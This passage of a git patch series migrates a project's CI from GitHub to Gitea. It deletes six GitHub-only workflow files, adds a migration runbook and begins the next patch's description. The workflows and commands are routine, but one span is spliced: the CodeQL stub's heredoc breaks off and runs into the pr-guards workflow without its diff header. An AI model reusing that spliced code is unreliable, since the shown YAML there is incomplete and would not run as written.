3/7] =?UTF-8?q?ci:=20retire=206=20.github/workflows=20GitH?= =?UTF-8?q?ub-only=20files=20+=20add=20migration=20runbook=20(RFC=20intern?= =?UTF-8?q?al#219=20=C2=A71,=20Category=20B)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Sweep companion to PR#372 + PR#378 (Cat A). These six .github/workflows files depend on GitHub-specific surface that Gitea does not provide: - auto-tag-runtime.yml — superseded by .gitea/publish-runtime-autobump.yml for patch bumps. Release:minor/major label-driven bumps are lost; follow-up issue suggested if anyone uses them. - branch-protection-drift.yml — drift_check.sh + apply.sh target Molecule-AI/molecule-core via `gh api` against GitHub's branch-protection schema. Gitea's schema differs; rebuilding is out of scope. Follow-up issue needed. - check-merge-group-trigger.yml — file's own header documents this is a structural no-op on Gitea (no merge queue, no `merge_group:` event type, no gh-readonly-queue refs). - codeql.yml — file's own header documents CodeQL Action incompatibility (github/codeql-action hits api.github.com bundle endpoints not implemented by Gitea). Per Hongming decision 2026-05-07 task #156 CodeQL is non-blocking until Gitea-compatible SAST lands. - pr-guards.yml — file's own header documents that Gitea has no `gh pr merge --auto` primitive; guard is a no-op. Branch protection on main doesn't require the pr-guards check name. - promote-latest.yml — uses imjasonh/setup-crane against ghcr.io, which was retired during the 2026-05-06 migration in favor of ECR (per canary-verify.yml header notes). Workflow has nothing left to retag. Also adds runbooks/gitea-actions-migration-checklist.md documenting: - Four-surface audit pattern (feedback_gitea_actions_migration_audit_pattern) - Category A/B/C/D file lists with rationale - Verification steps after all sweep PRs land - Cross-link to follow-up issues (label-driven bumps, Gitea-compatible drift detection, ECR-based promote) Branch protection check: required status checks on main are only `Secret scan / Scan diff for credential-shaped strings (pull_request)` and `sop-tier-check / tier-check (pull_request)`. No deleted file's job name appears in required_status_checks. DO NOT MERGE without orchestrator-dispatched Five-Axis review + @hongmingwang chat-go. Cross-links: - RFC: molecule-ai/internal#219 - Companion: PR#372 (ci.yml port), PR#378 (Cat A mirrored deletions) Co-Authored-By: Claude Opus 4.7 (1M context) --- .github/workflows/auto-tag-runtime.yml | 138 ------------------ .github/workflows/branch-protection-drift.yml | 111 -------------- .../workflows/check-merge-group-trigger.yml | 48 ------ .github/workflows/codeql.yml | 136 ----------------- .github/workflows/pr-guards.yml | 63 -------- .github/workflows/promote-latest.yml | 85 ----------- runbooks/gitea-actions-migration-checklist.md | 112 ++++++++++++++ 7 files changed, 112 insertions(+), 581 deletions(-) delete mode 100644 .github/workflows/auto-tag-runtime.yml delete mode 100644 .github/workflows/branch-protection-drift.yml delete mode 100644 .github/workflows/check-merge-group-trigger.yml delete mode 100644 .github/workflows/codeql.yml delete mode 100644 .github/workflows/pr-guards.yml delete mode 100644 .github/workflows/promote-latest.yml create mode 100644 runbooks/gitea-actions-migration-checklist.md diff --git a/.github/workflows/auto-tag-runtime.yml b/.github/workflows/auto-tag-runtime.yml deleted file mode 100644 index 5ba8257d..00000000 --- a/.github/workflows/auto-tag-runtime.yml +++ /dev/null @@ -1,138 +0,0 @@ -name: auto-tag-runtime - -# Auto-tag runtime releases on every merge to main that touches workspace/. -# This is the entry point of the runtime CD chain: -# -# merge PR → auto-tag-runtime (this) → publish-runtime → cascade → template -# image rebuilds → repull on hosts. -# -# Default bump is patch. Override via PR label `release:minor` or -# `release:major` BEFORE merging — the label is read off the merged PR -# associated with the push commit. -# -# Skips when: -# - The push isn't to main (other branches don't auto-release). -# - The merge commit message contains `[skip-release]` (escape hatch -# for cleanup PRs that touch workspace/ but shouldn't ship). - -on: - push: - branches: [main] - paths: - - "workspace/**" - - "scripts/build_runtime_package.py" - - ".github/workflows/auto-tag-runtime.yml" - - ".github/workflows/publish-runtime.yml" - -permissions: - contents: write # to push the new tag - pull-requests: read # to read labels off the merged PR - -concurrency: - # Serialize tag bumps so two near-simultaneous merges can't both think - # they're 0.1.6 and race to push the same tag. - group: auto-tag-runtime - cancel-in-progress: false - -jobs: - tag: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - with: - fetch-depth: 0 # need full tag history for `git describe` / sort - - - name: Skip when commit asks - id: skip - run: | - MSG=$(git log -1 --format=%B "${{ github.sha }}") - if echo "$MSG" | grep -qiE '\[skip-release\]|\[no-release\]'; then - echo "skip=true" >> "$GITHUB_OUTPUT" - echo "Commit message contains [skip-release] — no tag will be created." - else - echo "skip=false" >> "$GITHUB_OUTPUT" - fi - - - name: Determine bump kind from PR label - id: bump - if: steps.skip.outputs.skip != 'true' - env: - # Gitea-shape token (act_runner forwards GITHUB_TOKEN as a - # short-lived per-run secret with read access to this repo). - # We hit `/api/v1/repos/.../pulls?state=closed` directly - # because `gh pr list` calls Gitea's GraphQL endpoint, which - # returns HTTP 405 (issue #75 / post-#66 sweep). - GITEA_TOKEN: ${{ github.token }} - REPO: ${{ github.repository }} - GITEA_API_URL: ${{ github.server_url }}/api/v1 - PUSH_SHA: ${{ github.sha }} - run: | - # Find the merged PR whose merge_commit_sha matches this push. - # Gitea's `/repos/{owner}/{repo}/pulls?state=closed` returns - # PRs sorted newest-first; we paginate up to 50 and jq-filter - # on `merge_commit_sha == PUSH_SHA`. Bounded — auto-tag fires - # per push to main, so the matching PR is always among the - # most recent closures. 50 is comfortably more than the - # ~10-20 staging→main promotes that close in any reasonable - # window. - set -euo pipefail - PRS_JSON=$(curl --fail-with-body -sS \ - -H "Authorization: token ${GITEA_TOKEN}" \ - -H "Accept: application/json" \ - "${GITEA_API_URL}/repos/${REPO}/pulls?state=closed&sort=newest&limit=50" \ - 2>/dev/null || echo "[]") - PR=$(printf '%s' "$PRS_JSON" \ - | jq -c --arg sha "$PUSH_SHA" \ - '[.[] | select(.merged_at != null and .merge_commit_sha == $sha)] | .[0] // empty') - if [ -z "$PR" ] || [ "$PR" = "null" ]; then - echo "No merged PR found for ${PUSH_SHA} — defaulting to patch bump." - echo "kind=patch" >> "$GITHUB_OUTPUT" - exit 0 - fi - # Gitea returns labels under `.labels[].name`, same shape as - # GitHub's REST. The previous `gh pr list --json number,labels` - # output was identical; jq filter unchanged. - LABELS=$(printf '%s' "$PR" | jq -r '.labels[]?.name // empty') - if echo "$LABELS" | grep -qx 'release:major'; then - echo "kind=major" >> "$GITHUB_OUTPUT" - elif echo "$LABELS" | grep -qx 'release:minor'; then - echo "kind=minor" >> "$GITHUB_OUTPUT" - else - echo "kind=patch" >> "$GITHUB_OUTPUT" - fi - - - name: Compute next version from latest runtime-v* tag - id: version - if: steps.skip.outputs.skip != 'true' - run: | - # Find the highest runtime-vX.Y.Z tag. `sort -V` handles semver - # ordering; `grep` filters to the right tag prefix. - LATEST=$(git tag --list 'runtime-v*' | sort -V | tail -1) - if [ -z "$LATEST" ]; then - # No prior tag — start the runtime line at 0.1.0. - CURRENT="0.0.0" - else - CURRENT="${LATEST#runtime-v}" - fi - MAJOR=$(echo "$CURRENT" | cut -d. -f1) - MINOR=$(echo "$CURRENT" | cut -d. -f2) - PATCH=$(echo "$CURRENT" | cut -d. -f3) - case "${{ steps.bump.outputs.kind }}" in - major) MAJOR=$((MAJOR+1)); MINOR=0; PATCH=0;; - minor) MINOR=$((MINOR+1)); PATCH=0;; - patch) PATCH=$((PATCH+1));; - esac - NEW="$MAJOR.$MINOR.$PATCH" - echo "current=$CURRENT" >> "$GITHUB_OUTPUT" - echo "new=$NEW" >> "$GITHUB_OUTPUT" - echo "Bumping runtime $CURRENT → $NEW (${{ steps.bump.outputs.kind }})" - - - name: Push new tag - if: steps.skip.outputs.skip != 'true' - run: | - NEW_TAG="runtime-v${{ steps.version.outputs.new }}" - git config user.name "github-actions[bot]" - git config user.email "41898282+github-actions[bot]@users.noreply.github.com" - git tag -a "$NEW_TAG" -m "runtime $NEW_TAG (auto-bump from ${{ steps.bump.outputs.kind }})" - git push origin "$NEW_TAG" - echo "Pushed $NEW_TAG — publish-runtime workflow will fire on the tag." diff --git a/.github/workflows/branch-protection-drift.yml b/.github/workflows/branch-protection-drift.yml deleted file mode 100644 index 2a782405..00000000 --- a/.github/workflows/branch-protection-drift.yml +++ /dev/null @@ -1,111 +0,0 @@ -name: branch-protection drift check - -# Catches out-of-band edits to branch protection (UI clicks, manual gh -# api PATCH from a one-off ops session) by comparing live state against -# tools/branch-protection/apply.sh's desired state every day. Fails the -# workflow when they drift; the failure is the signal. -# -# When it fails: re-run apply.sh to put the live state back to the -# script's intent, OR update apply.sh to encode the new intent and -# commit. Either way the script is the source of truth. - -on: - schedule: - # 14:00 UTC daily. Off-hours for most teams; gives a fresh signal - # at the start of every working day. - - cron: '0 14 * * *' - workflow_dispatch: - pull_request: - branches: [staging, main] - paths: - - 'tools/branch-protection/**' - - '.github/workflows/**' - - '.github/workflows/branch-protection-drift.yml' - -permissions: - contents: read - -jobs: - drift: - name: Branch protection drift - runs-on: ubuntu-latest - timeout-minutes: 5 - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - - # Token strategy by trigger: - # - # - schedule (daily canary): hard-fail when the admin token is - # missing. This is the *only* trigger where silent soft-skip is - # dangerous — a missing secret on the cron run means the drift - # gate has effectively disappeared with no human in the loop to - # notice. Per feedback_schedule_vs_dispatch_secrets_hardening.md - # the rule is "schedule/automated triggers must hard-fail". - # - # - pull_request (touching tools/branch-protection/**): soft-skip - # with a prominent warning. A PR cannot retroactively drift the - # live state — drift happens *between* PRs (UI clicks, manual - # gh api PATCH) and is the schedule's job to catch. The PR-time - # gate would only catch typos in apply.sh, which the apply.sh - # *_payload unit tests catch better. A human is reviewing the - # PR and will see the warning in the workflow log. - # - # - workflow_dispatch (operator one-off): soft-skip with warning, - # so an operator can run a diagnostic without configuring the - # secret first. - - name: Verify admin token present (hard-fail on schedule only) - env: - GH_TOKEN_FOR_ADMIN_API: ${{ secrets.GH_TOKEN_FOR_ADMIN_API }} - run: | - if [[ -n "$GH_TOKEN_FOR_ADMIN_API" ]]; then - echo "GH_TOKEN_FOR_ADMIN_API present — drift_check will run with admin scope." - exit 0 - fi - if [[ "${{ github.event_name }}" == "schedule" ]]; then - echo "::error::GH_TOKEN_FOR_ADMIN_API secret missing on the daily canary." >&2 - echo "" >&2 - echo "The schedule run is the SoT for branch-protection drift detection." >&2 - echo "Without admin scope it silently passes, hiding any out-of-band edits." >&2 - echo "Set GH_TOKEN_FOR_ADMIN_API at Settings → Secrets and variables → Actions." >&2 - exit 1 - fi - echo "::warning::GH_TOKEN_FOR_ADMIN_API secret missing — drift_check will be SKIPPED." - echo "::warning::PR drift checks need repo-admin scope to read /branches/:b/protection." - echo "::warning::This is non-fatal: the daily schedule run is the canonical drift gate." - echo "SKIP_DRIFT_CHECK=1" >> "$GITHUB_ENV" - - - name: Run drift check - if: env.SKIP_DRIFT_CHECK != '1' - env: - # Repo-admin scope, needed for /branches/:b/protection. - GH_TOKEN: ${{ secrets.GH_TOKEN_FOR_ADMIN_API }} - run: bash tools/branch-protection/drift_check.sh - - # Self-test the parity script before running it on the real - # workflows — pins the script's classification logic against - # synthetic safe/unsafe/missing/unsafe-mix/matrix fixtures so a - # regression in the script can't false-pass on the production - # workflow audit. Cheap (~0.5s); always runs. - - name: Self-test check-name parity script - run: bash tools/branch-protection/test_check_name_parity.sh - - # Check-name parity gate (#144 / saved memory - # feedback_branch_protection_check_name_parity). - # - # drift_check.sh asserts the live branch protection matches what - # apply.sh would set; check_name_parity.sh closes the orthogonal - # gap: it asserts every required check name in apply.sh maps to a - # workflow job whose "always emits this status" shape is intact. - # - # The two checks fail in different scenarios: - # - # - drift_check fails → live state was rewritten out-of-band - # (UI click, manual PATCH). - # - check_name_parity fails → an apply.sh required name has no - # emitter, OR the emitting workflow has a top-level paths: - # filter without per-step if-gates (the silent-block shape). - # - # Cheap (~1s); runs without the admin token because it only reads - # apply.sh + .github/workflows/ from the checkout. - - name: Run check-name parity gate - run: bash tools/branch-protection/check_name_parity.sh diff --git a/.github/workflows/check-merge-group-trigger.yml b/.github/workflows/check-merge-group-trigger.yml deleted file mode 100644 index 7d65a526..00000000 --- a/.github/workflows/check-merge-group-trigger.yml +++ /dev/null @@ -1,48 +0,0 @@ -name: Check merge_group trigger on required workflows - -# Pre-merge guard against the deadlock pattern where a workflow whose -# check is in `required_status_checks` lacks a `merge_group:` trigger. -# Without it, GitHub merge queue stalls forever in AWAITING_CHECKS -# because the required check can't fire on `gh-readonly-queue/...` refs. -# -# This workflow: -# 1. Lists required status checks on the branch protection rule for `staging` -# 2. For each required check, finds the workflow that produces it (by job -# name match) -# 3. Fails if any such workflow lacks `merge_group:` in its triggers -# -# Reasoning for staging-only: main has its own CI gating model (PR review), -# but staging is what the merge queue runs on, so it's the trigger that -# matters. -# -# Gitea stub: Gitea has no merge queue feature and no `merge_group:` -# event type. The linter would find no `merge_group:` triggers to verify -# (they don't exist on Gitea), so the lint is vacuously satisfied. -# Converting to a no-op stub keeps the workflow+job name stable for any -# commit-status context consumers while eliminating the `gh api` call -# that fails against Gitea's REST surface (#75 / PR-D). - -on: - pull_request: - paths: - - '.github/workflows/**.yml' - - '.github/workflows/**.yaml' - push: - branches: [staging, main] - paths: - - '.github/workflows/**.yml' - - '.github/workflows/**.yaml' - -jobs: - check: - name: Required workflows have merge_group trigger - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - name: Gitea no-op (merge queue not applicable) - run: | - echo "Gitea Actions — merge queue not supported; no-op." - echo "On GitHub this workflow lints that required-check workflows declare" - echo "merge_group: triggers to prevent queue deadlock. On Gitea that" - echo "constraint is inapplicable — all workflows pass vacuously." diff --git a/.github/workflows/codeql.yml b/.github/workflows/codeql.yml deleted file mode 100644 index dec301a6..00000000 --- a/.github/workflows/codeql.yml +++ /dev/null @@ -1,136 +0,0 @@ -name: CodeQL - -# Stub workflow — CodeQL Action is structurally incompatible with Gitea -# Actions (post-2026-05-06 SCM migration off GitHub). -# -# Why this is a stub, not a real CodeQL run: -# -# 1. github/codeql-action/init@v4 hits api.github.com endpoints -# (CodeQL CLI bundle download + query-pack registry + telemetry) -# that Gitea 1.22.x does NOT proxy. The act_runner has -# GITHUB_SERVER_URL=https://git.moleculesai.app correctly set -# (per saved memory feedback_act_runner_github_server_url and -# /config.yaml on the operator host), but the Gitea API surface -# simply does not implement the codeql-action bundle endpoints. -# Observed in run 1d/3101 (2026-05-07): "::error::404 page not -# found" inside the Initialize CodeQL step, before any analysis. -# -# 2. PR #35 attempted to mark `continue-on-error: true` at the JOB -# level (correct YAML structure). Gitea 1.22.6 does NOT propagate -# job-level continue-on-error to the commit-status API — every -# matrix leg still posts `failure` to the status surface, which -# keeps OVERALL=failure on every push to main + staging and -# blocks visual auto-promote signals (#156). -# -# 3. Hongming policy decision (2026-05-07, task #156): CodeQL is -# ADVISORY, not blocking, on Gitea Actions. We do not block PR -# merge or staging→main promotion on CodeQL findings until we -# have a Gitea-compatible static-analysis pipeline. -# -# What this stub preserves: -# -# - Workflow name `CodeQL` (referenced by auto-promote-staging.yml -# line 67 as a workflow_run gate — must stay stable). -# - Job name template `Analyze (${{ matrix.language }})` and the -# 3-leg matrix (go, javascript-typescript, python). Branch -# protection / required-check parity (#144) keys on these -# exact context names. -# - merge_group + push + pull_request + schedule triggers, so the -# merge-queue check name still resolves (per saved memory -# feedback_branch_protection_check_name_parity). -# -# Re-enabling real analysis (future work): -# -# - Option A: self-hosted Semgrep / OpenGrep via a custom action -# that doesn't hit api.github.com. Tracked behind #156 follow-up. -# - Option B: Sonatype Nexus IQ or similar, called from a step -# that uses the Gitea-issued token only. -# - Option C: re-host this workflow on a small GitHub mirror used -# ONLY for SAST (push-mirrored from Gitea). Acceptable trade-off -# if/when payment is restored on a non-suspended GitHub org — -# but per saved memory feedback_no_single_source_of_truth, we -# should design for multi-vendor backup, not GitHub-only SAST. -# -# Until one of those lands, this stub keeps commit-status green so -# the auto-promote chain isn't permanently red on a tool we cannot -# actually run. -# -# Security policy: ADVISORY. We accept the residual risk of un-scanned -# pushes during this window. Compensating controls in place: -# - secret-scan.yml runs on every push (active, blocks on hits) -# - block-internal-paths.yml blocks forbidden file paths -# - lint-curl-status-capture.yml catches one specific class of bug -# - branch-protection-drift.yml + the merge_group required-checks -# parity keep the gate surface stable -# These are not equivalent to CodeQL coverage. Status of the -# replacement plan is tracked in #156. - -on: - push: - branches: [main, staging] - pull_request: - branches: [main, staging] - # Required so the matrix legs emit a real result on the queued - # commit instead of a false-green when merge queue is enabled. - # Per saved memory feedback_branch_protection_check_name_parity: - # path-filtered / matrix workflows MUST emit the protected name - # via a job that always runs. - merge_group: - types: [checks_requested] - schedule: - # Weekly heartbeat. Cheap on a stub (the no-op job is ~5s) but - # keeps the workflow visible in Gitea's Actions UI so the next - # operator notices it's a stub instead of a missing surface. - - cron: '30 1 * * 0' - -# Workflow-level concurrency: only one stub run per branch/PR at a -# time. cancel-in-progress: false because a quick follow-up push -# shouldn't kill an in-flight run — even though the stub is fast, -# the contract should match a real CodeQL run for when we re-enable. -concurrency: - group: codeql-${{ github.ref }} - cancel-in-progress: false - -permissions: - actions: read - contents: read - # No security-events: write — we don't call the upload API anyway, - # GHAS isn't on Gitea. - -jobs: - analyze: - # Job NAME shape is load-bearing — auto-promote-staging.yml + - # branch protection both key on `Analyze (${{ matrix.language }})`. - # Do NOT rename without coordinating both surfaces. - name: Analyze (${{ matrix.language }}) - runs-on: ubuntu-latest - timeout-minutes: 5 - - strategy: - fail-fast: false - matrix: - language: [go, javascript-typescript, python] - - steps: - # Single-step stub: log the policy decision + emit success. - # Exit 0 explicitly so the commit-status API records `success` - # for each of the three matrix legs. - - name: CodeQL stub (advisory, non-blocking on Gitea) - shell: bash - run: | - set -euo pipefail - cat <> "$GITHUB_OUTPUT" - echo "::notice::Gitea Actions detected — auto-merge gating is not applicable here (Gitea has no --auto merge primitive). Job will no-op." - else - echo "is_gitea=false" >> "$GITHUB_OUTPUT" - fi - - - name: Disable auto-merge (GitHub only) - if: steps.host.outputs.is_gitea != 'true' - env: - GH_TOKEN: ${{ github.token }} - PR: ${{ github.event.pull_request.number }} - REPO: ${{ github.repository }} - NEW_SHA: ${{ github.sha }} - run: | - set -eu - gh pr merge "$PR" --disable-auto -R "$REPO" || true - gh pr comment "$PR" -R "$REPO" --body "🔒 Auto-merge disabled — new commit (\`${NEW_SHA:0:7}\`) pushed after auto-merge was enabled. The merge queue locks SHAs at entry, so subsequent pushes can race. Verify the new commit and re-enable with \`gh pr merge --auto\`." - - - name: Gitea no-op - if: steps.host.outputs.is_gitea == 'true' - run: echo "Gitea Actions — auto-merge gating not applicable; no-op (job intentionally green so branch protection's required-check name lands SUCCESS)." diff --git a/.github/workflows/promote-latest.yml b/.github/workflows/promote-latest.yml deleted file mode 100644 index e16027c3..00000000 --- a/.github/workflows/promote-latest.yml +++ /dev/null @@ -1,85 +0,0 @@ -name: promote-latest - -# Manually retag ghcr.io/molecule-ai/platform:staging- → :latest -# (and the same for the tenant image). Use this to: -# -# 1. Promote a :staging- to prod before the canary fleet is live -# (one-off during the initial rollout). -# 2. Roll back :latest to a prior known-good digest after a bad -# promotion slipped past canary (use scripts/rollback-latest.sh -# for a local / emergency path; this workflow is for scheduled -# or from-browser promotions). -# -# Running this workflow needs no extra secrets — GitHub's default -# GITHUB_TOKEN has write:packages for repo-owned GHCR images, which -# is all we need for a remote retag via `crane tag`. - -on: - workflow_dispatch: - inputs: - sha: - description: 'Short sha to promote (e.g. 4c1d56e). Must match an existing :staging- tag.' - required: true - type: string - -permissions: - contents: read - packages: write - -env: - IMAGE_NAME: ghcr.io/molecule-ai/platform - TENANT_IMAGE_NAME: ghcr.io/molecule-ai/platform-tenant - -jobs: - promote: - runs-on: ubuntu-latest - steps: - - uses: imjasonh/setup-crane@6da1ae018866400525525ce74ff892880c099987 # v0.5 - - - name: GHCR login - run: | - echo "${{ secrets.GITHUB_TOKEN }}" \ - | crane auth login ghcr.io -u "${{ github.actor }}" --password-stdin - - - name: Retag platform image - run: | - set -eu - SRC="${IMAGE_NAME}:staging-${{ inputs.sha }}" - if ! crane digest "$SRC" >/dev/null 2>&1; then - echo "::error::$SRC not found in registry — double-check the sha." - exit 1 - fi - EXPECTED=$(crane digest "$SRC") - crane tag "$SRC" latest - ACTUAL=$(crane digest "${IMAGE_NAME}:latest") - if [ "$ACTUAL" != "$EXPECTED" ]; then - echo "::error::retag digest mismatch (expected $EXPECTED, got $ACTUAL)" - exit 1 - fi - echo "OK ${IMAGE_NAME}:latest → $ACTUAL" - - - name: Retag tenant image - run: | - set -eu - SRC="${TENANT_IMAGE_NAME}:staging-${{ inputs.sha }}" - if ! crane digest "$SRC" >/dev/null 2>&1; then - echo "::error::$SRC not found — tenant image may not have built for this sha." - exit 1 - fi - EXPECTED=$(crane digest "$SRC") - crane tag "$SRC" latest - ACTUAL=$(crane digest "${TENANT_IMAGE_NAME}:latest") - if [ "$ACTUAL" != "$EXPECTED" ]; then - echo "::error::tenant retag digest mismatch" - exit 1 - fi - echo "OK ${TENANT_IMAGE_NAME}:latest → $ACTUAL" - - - name: Summary - run: | - { - echo "## :latest promoted to staging-${{ inputs.sha }}" - echo - echo "Both platform + tenant images retagged. Prod tenants" - echo "will auto-pull within their 5-min update cycle." - } >> "$GITHUB_STEP_SUMMARY" diff --git a/runbooks/gitea-actions-migration-checklist.md b/runbooks/gitea-actions-migration-checklist.md new file mode 100644 index 00000000..dd87d0c5 --- /dev/null +++ b/runbooks/gitea-actions-migration-checklist.md @@ -0,0 +1,112 @@ +# Gitea Actions migration checklist (molecule-core) + +Created 2026-05-11 as part of **RFC `molecule-ai/internal#219` §1** — the +sweep of `.github/workflows/*.yml` files in `molecule-core` after the +2026-05-06 GitHub → Gitea migration. Documents which workflows were +retired, which were ported, and the reasoning for each. + +The sweep used the four-surface audit pattern from saved memory +`feedback_gitea_actions_migration_audit_pattern`: + +1. **YAML** — drop `workflow_dispatch.inputs`, `merge_group`, + `environment:`. Adjust `runs-on:`. Set `env.GITHUB_SERVER_URL` + per `feedback_act_runner_github_server_url`. +2. **Cache** — verify `actions/cache@v4` / `upload-artifact` pin + compatibility with Gitea 1.22.x runner. +3. **Token** — auto-injected `GITHUB_TOKEN` works for same-repo + operations; cross-repo dispatch needs explicit secret. +4. **Docs** — top-of-file "Ported from .github/workflows/X.yml on + YYYY-MM-DD per RFC internal#219 §1 sweep" comment. + +Per RFC §1 contract, all ports land with `continue-on-error: true` on +every job to surface bugs without blocking; a follow-up PR flips +`continue-on-error: false` after triage. + +## Category A — already mirrored (deleted .github/ copy) + +These workflows had a working `.gitea/workflows/X.yml` twin at the time +of the sweep. The `.github/` copies were silently dead (Gitea Actions +in molecule-core only registers `.gitea/workflows/`) and have been +removed. + +| File | .gitea/ twin | +|---|---| +| `publish-runtime.yml` | `.gitea/workflows/publish-runtime.yml` (ported via issue #206) | +| `secret-scan.yml` | `.gitea/workflows/secret-scan.yml` | + +## Category B — GitHub-only, retired + +These workflows depend on GitHub-specific surface (merge queue, GitHub +auto-merge primitive, github.com REST API, GHCR registry, CodeQL action +that hits api.github.com bundle endpoints) that Gitea does not provide. +No equivalent Gitea-side workflow is needed; the underlying mechanism +either doesn't exist on Gitea or has been replaced by a different +pipeline. + +| File | Why retired | +|---|---| +| `auto-tag-runtime.yml` | Superseded by `.gitea/workflows/publish-runtime-autobump.yml` (auto-bump-on-workspace-edit). The autobump only does patch bumps; the deleted workflow supported `release:minor` / `release:major` PR-label-driven bumps. Follow-up issue should track restoring label-driven minor/major if anyone uses it. | +| `branch-protection-drift.yml` | Targets `Molecule-AI/molecule-core` on GitHub via `gh api /repos/.../branch-protection` — entirely GitHub-API specific. `tools/branch-protection/drift_check.sh` and `apply.sh` reference the GitHub schema (status_check_contexts, dismiss_stale_reviews, etc.) which differs from Gitea's `branch_protections` shape. Rebuilding for Gitea is out of scope for the RFC #219 sweep; follow-up issue needed for Gitea-compatible branch-protection drift detection. | +| `check-merge-group-trigger.yml` | The workflow's own header (lines 18-23) documents that it's vacuously satisfied on Gitea — Gitea has no merge queue, no `merge_group:` event type, no `gh-readonly-queue/...` refs. Nothing to lint. | +| `codeql.yml` | The workflow's own header (lines 3-67) documents that `github/codeql-action/init@v4` hits api.github.com bundle endpoints not implemented by Gitea (observed: `::error::404 page not found` in Initialize CodeQL step). Per Hongming decision 2026-05-07 (task #156): CodeQL is ADVISORY/non-blocking until a Gitea-compatible SAST pipeline lands. Replacement options (Semgrep self-host, Sonatype, GitHub-mirror-for-SAST) tracked in #156. | +| `pr-guards.yml` | The workflow's own header documents that Gitea has no `gh pr merge --auto` primitive — the guard is a structural no-op on Gitea. Branch protection on `main` does NOT reference any `pr-guards` check name; deletion is safe. | +| `promote-latest.yml` | Uses `imjasonh/setup-crane` against `ghcr.io/molecule-ai/platform` — the GHCR registry was retired during the 2026-05-06 Gitea migration (per `canary-verify.yml` header notes, the canonical tenant image moved to ECR `153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/platform-tenant`). The workflow can no longer find any image to retag. Follow-up issue suggested if an ECR-based retag promote is desired. | + +## Category C — ported to .gitea/ + +These workflows had real ongoing CI value but no Gitea-side equivalent. +Each was ported to `.gitea/workflows/X.yml` with: + +- `workflow_dispatch.inputs` removed (Gitea 1.22.6 parser rejects them — + per `feedback_gitea_workflow_dispatch_inputs_unsupported`) +- `merge_group:` trigger removed (no merge queue) +- `environment:` blocks removed (Gitea has no environments) +- `dorny/paths-filter@v4` replaced with inline `git diff` (per the + pattern established in PR#372 ci.yml port) +- `env.GITHUB_SERVER_URL: https://git.moleculesai.app` set at workflow + level (belt-and-suspenders for `actions/checkout` etc.) +- `continue-on-error: true` on every job (RFC §1 contract — surface + defects without blocking; follow-up PR flips after triage) +- Top-of-file header: "Ported from .github/workflows/X.yml on + YYYY-MM-DD per RFC internal#219 §1 sweep." + +See the C-1 / C-2 / C-3 sweep PRs for the file lists and per-file +adjustments. + +## Category D — parser-rejected (none for molecule-core) + +The RFC #219 §1 brief lists 7 workflows as parser-rejected (`audit-orphan-instances`, +`bake-thin-ami`, `bench-provision-time`, `cache-probe`, `deploy-pipeline`, +`e2e-tunnel-reboot`, `persona-author-check`). Verification against +molecule-core's tree (and the `docker logs molecule-gitea-1` parser-rejection +log) shows these workflows belong to other repos: + +- `audit-orphan-instances`, `bake-thin-ami`, `bench-provision-time`, + `deploy-pipeline`, `e2e-tunnel-reboot` live in `molecule-ai/molecule-controlplane` +- `cache-probe`, `persona-author-check` live in `molecule-ai/internal` + +For molecule-core, **Category D is empty**. + +## Verification + +After all sweep PRs land: + +```bash +# Should produce nothing. +ls .github/workflows/*.yml | grep -vF ci.yml + +# Should list 6 working workflows from the .gitea/ port directory + the +# C-1/C-2/C-3 ports. +ls .gitea/workflows/*.yml +``` + +Gitea Actions server should produce NO `[W] ignore invalid workflow` +lines for any `.gitea/workflows/X.yml` in molecule-core when commits +land on `main`: + +```bash +ssh root@5.78.80.188 'docker logs molecule-gitea-1 --since 10m 2>&1 \ + | grep "ignore invalid workflow" \ + | grep -i molecule-core' +# Expected: empty. +``` From 58f80f7e42399542a9b9af8ca12ba4d08b3dc233 Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:23:30 -0700 Subject: [PATCH 4/7] =?UTF-8?q?ci:=20port=2010=20E2E=20workflows=20to=20.g?= =?UTF-8?q?itea/workflows/=20(RFC=20internal#219=20=C2=A71,=20Category=20C?= =?UTF-8?q?-2)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Sweep companion to PR#372 (ci.yml port), PR#378 (Cat A), PR#379 (Cat B), PR#383 (Cat C-1 gates/lints). Ports 10 E2E-shaped workflow files from .github/workflows/ to .gitea/workflows/. Each port applies the four-surface audit pattern. Per RFC §1 contract: every job has `continue-on-error: true` so surfaced defects do not block PRs. Follow-up PR flips to false after triage. Files ported: - canary-staging.yml — every-30-min canary smoke against staging. Two `actions/github-script@v9` blocks (open-issue-on-failure + auto-close-on-success) replaced with curl calls to the Gitea REST API (/api/v1/repos/.../issues|comments). Same single-issue + comment-on-repeat semantics. - canary-verify.yml — post-publish image promote-to-:latest. Still uses workflow_run trigger; Gitea 1.22.6's support for that event is partial — flagged in the file header. If review confirms it doesn't fire, follow-up PR replaces with push-with-paths-filter on .gitea/workflows/publish-workspace-server-image.yml. Removed the `|| github.event_name == 'workflow_dispatch'` branch (this port drops workflow_dispatch). - continuous-synth-e2e.yml — synthetic E2E every 10 min cron. Dropped workflow_dispatch.inputs. Real-cron paths intact. - e2e-api.yml — API smoke. dorny/paths-filter@v4 replaced with inline `git diff` per PR#372 pattern; detect-changes job + per-step if-gate shape preserved for branch-protection check-name parity. - e2e-staging-canvas.yml — Playwright canvas E2E. dorny/paths-filter replaced with inline git diff. upload-artifact@v3.2.2 kept (Gitea 1.22.x compatible per PR#372 notes; v4+ is not). - e2e-staging-external.yml — workspace-status enum regression coverage. Dropped workflow_dispatch.inputs + cron-trigger inputs. - e2e-staging-saas.yml — full lifecycle E2E. Dropped workflow_dispatch.inputs. Heaviest port; cleaned via mechanical porter then manual review. - e2e-staging-sanity.yml — weekly intentional-failure teardown sanity. github-script issue block replaced with Gitea API curl. - handlers-postgres-integration.yml — Postgres integration tests. dorny/paths-filter replaced with inline git diff. Dropped merge_group + workflow_dispatch. - harness-replays.yml — tests/harness boot suite. Standard port. Dropped merge_group + workflow_dispatch. Open questions for review: 1. workflow_run trigger on canary-verify.yml — unconfirmed Gitea 1.22.6 support. continue-on-error+canary-verify-dead doesn't block anything either way; review can validate. 2. github.event.before fallback in detect-changes paths — on Gitea the event.before field is populated for push events but its exact shape on initial 